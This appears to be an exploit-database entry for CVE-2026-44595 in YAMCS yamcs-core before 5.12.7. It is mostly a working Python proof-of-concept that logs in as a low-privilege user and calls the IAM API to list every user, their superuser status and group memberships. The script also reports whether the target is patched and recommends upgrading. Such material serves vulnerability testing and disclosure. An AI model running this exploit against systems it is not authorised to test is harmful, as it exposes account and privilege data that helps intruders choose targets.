
YAMCS yamcs-core < 5.12.7 – User Enumeration (CVE-2026-44595; fixed in 5.12.7)

Categories: WebApps

YAMCS yamcs-core < 5.12.7 – User Enumeration (CVE-2026-44595; fixed in 5.12.7)

Proof of Concept (PoC)

poc.py
# Exploit Title: YAMCS yamcs-core < 5.12.7 -  User Enumeration 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44595
# Category: Remote / Information Disclosure
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29

#!/usr/bin/env python3
"""
CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
=================================================================
IAM API endpoints (listUsers, getUser, listGroups, getGroup) do
not enforce SystemPrivilege.ControlAccess. Any authenticated user
can enumerate all accounts, superuser status, and group memberships.

Affected endpoints:
    GET /api/iam/users
    GET /api/iam/users/{name}
    GET /api/iam/groups
    GET /api/iam/groups/{name}
=================================================================
"""

import requests
import sys
import json

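def _fetch_listing(base, headers, path, key, timeout):
    """GET ``base + path`` with ``headers`` and return ``(status, items)``.

    ``status`` is the HTTP status code, or ``None`` when the request itself
    failed (connection error, timeout).  ``items`` is the list stored under
    ``key`` in the JSON body for a 200 response and an empty list otherwise.
    The status line is printed as a side effect so every probe is visible.
    """
    try:
        resp = requests.get(f"{base}{path}", headers=headers, timeout=timeout)
    except requests.RequestException as exc:
        print(f"    [-] Request error: {exc}")
        return None, []
    print(f"    HTTP: {resp.status_code}")
    if resp.status_code != 200:
        return resp.status_code, []
    try:
        body = resp.json()
    except ValueError:
        # A 200 without a JSON body proves nothing either way; report it.
        print("    [?] 200 response but body is not JSON — inspect manually")
        return resp.status_code, []
    items = body.get(key, []) if isinstance(body, dict) else []
    return resp.status_code, items


def _report(status, label):
    """Print the verdict for a non-200 probe; 403 is the patched behaviour."""
    if status == 403:
        print("    [+] 403 Access Denied — PATCHED")
    elif status == 401:
        print("    [?] 401 — bearer token rejected; check credentials / auth config")
    elif status is not None:
        print(f"    [?] HTTP {status} — unexpected for {label}; inspect manually")


def main():
    """Check one YAMCS instance for CVE-2026-44595 (IAM listing without ControlAccess).

    Usage: ``poc.py [target] [username] [password]``.  Defaults are
    ``http://localhost:8090`` and the ``testuser``/``test`` account that the
    header comment suggests creating with ``yamcsadmin``.

    Flow: obtain a bearer token with the password grant at ``/auth/token``,
    then GET ``/api/iam/users`` and ``/api/iam/groups`` with it.  A 200 with
    a listing is the vulnerable behaviour; a 403 is the patched behaviour;
    anything else is printed but not classified.

    Caveats for a meaningful result: the account must NOT hold
    ``SystemPrivilege.ControlAccess`` (otherwise a 200 is expected and proves
    nothing), and the password grant sends the credentials in the request
    body, so use an ``https://`` target for anything other than a local lab.

    Returns:
        None.  All results go to stdout; the exit status is 0 regardless.
    """
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
    username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
    password = sys.argv[3] if len(sys.argv) > 3 else "test"
    base = target.rstrip("/")
    # Bounded socket timeout so an unreachable target fails instead of hanging.
    timeout = 10

    print("=" * 65)
    print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
    print(f" Target:   {target}")
    print(f" Username: {username} (low-privilege account)")
    print("=" * 65)

    # --- [1] Authenticate ---------------------------------------------------
    print("\n[1] Authenticating as low-privilege user...")
    try:
        resp = requests.post(
            f"{base}/auth/token",
            data={"grant_type": "password",
                  "username": username,
                  "password": password},
            timeout=timeout,
        )
    except requests.RequestException as exc:
        print(f"    [-] Error: {exc}")
        return

    if resp.status_code != 200:
        print(f"    [-] Auth failed: HTTP {resp.status_code}")
        print("    [*] Create test user: yamcsadmin users create testuser --password test")
        return

    try:
        token = resp.json().get("access_token")
    except ValueError:
        token = None
    if not token:
        # Guard before slicing: a missing token would otherwise raise TypeError.
        print("    [-] Auth succeeded but the response carried no access_token")
        return
    # Echo only a prefix — the bearer token is a live credential.
    print(f"    [+] Token: {token[:30]}...")
    headers = {"Authorization": f"Bearer {token}"}

    # --- [2] Users ----------------------------------------------------------
    print("\n[2] GET /api/iam/users (requires ControlAccess — not enforced):")
    status, users = _fetch_listing(base, headers, "/api/iam/users", "users", timeout)
    if status == 200:
        print(f"\n    [!!!] VULNERABLE — {len(users)} users enumerated:")
        for user in users:
            flag = "SUPERUSER" if user.get("superuser") else "regular"
            print(f"    -> {user.get('name')} [{flag}]")
    else:
        _report(status, "/api/iam/users")

    # --- [3] Groups ---------------------------------------------------------
    print("\n[3] GET /api/iam/groups:")
    status, groups = _fetch_listing(base, headers, "/api/iam/groups", "groups", timeout)
    if status == 200:
        print(f"\n    [!!!] VULNERABLE — {len(groups)} groups enumerated:")
        for group in groups:
            print(f"    -> {group.get('name')} ({len(group.get('members', []))} members)")
    else:
        _report(status, "/api/iam/groups")

    print("\n" + "=" * 65)
    print(" Fix: Upgrade to yamcs-core >= 5.12.7")
    print("=" * 65)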

# Entry point: run the PoC only when executed as a script, not when imported.
if __name__ == "__main__":
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
